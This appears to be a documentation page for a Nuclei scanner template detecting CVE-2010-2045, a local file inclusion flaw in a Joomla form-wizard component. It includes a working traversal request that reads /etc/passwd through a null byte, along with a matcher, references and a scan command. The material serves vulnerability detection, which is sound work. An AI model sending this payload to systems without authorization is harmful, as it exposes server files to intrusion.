Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion
ID: CVE-2010-2045
Severity: high
Author: daffainfo
Tags: cve,cve2010,joomla,lfi,edb,packetstorm,dionesoft
Description
Section titled “Description”A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
YAML Source
Section titled “YAML Source”id: CVE-2010-2045
info: name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion author: daffainfo severity: high description: A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. impact: | Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12595 - https://nvd.nist.gov/vuln/detail/CVE-2010-2045 - http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/58574 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2045 cwe-id: CWE-22 epss-score: 0.01671 epss-percentile: 0.86287 cpe: cpe:2.3:a:dionesoft:com_dioneformwizard:1.0.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dionesoft product: com_dioneformwizard tags: cve,cve2010,joomla,lfi,edb,packetstorm,dionesoft
http: - method: GET path: - "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4b0a0048304602210085823fd97ba9579a3ca47b13f776d81951efb2506541bdd025077d3821afd610022100fb2272a45928019ac11cfd28a2fda2d0de7cfa41d3d36fe16a9c4052e4b76240:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2010/CVE-2010-2045.yaml"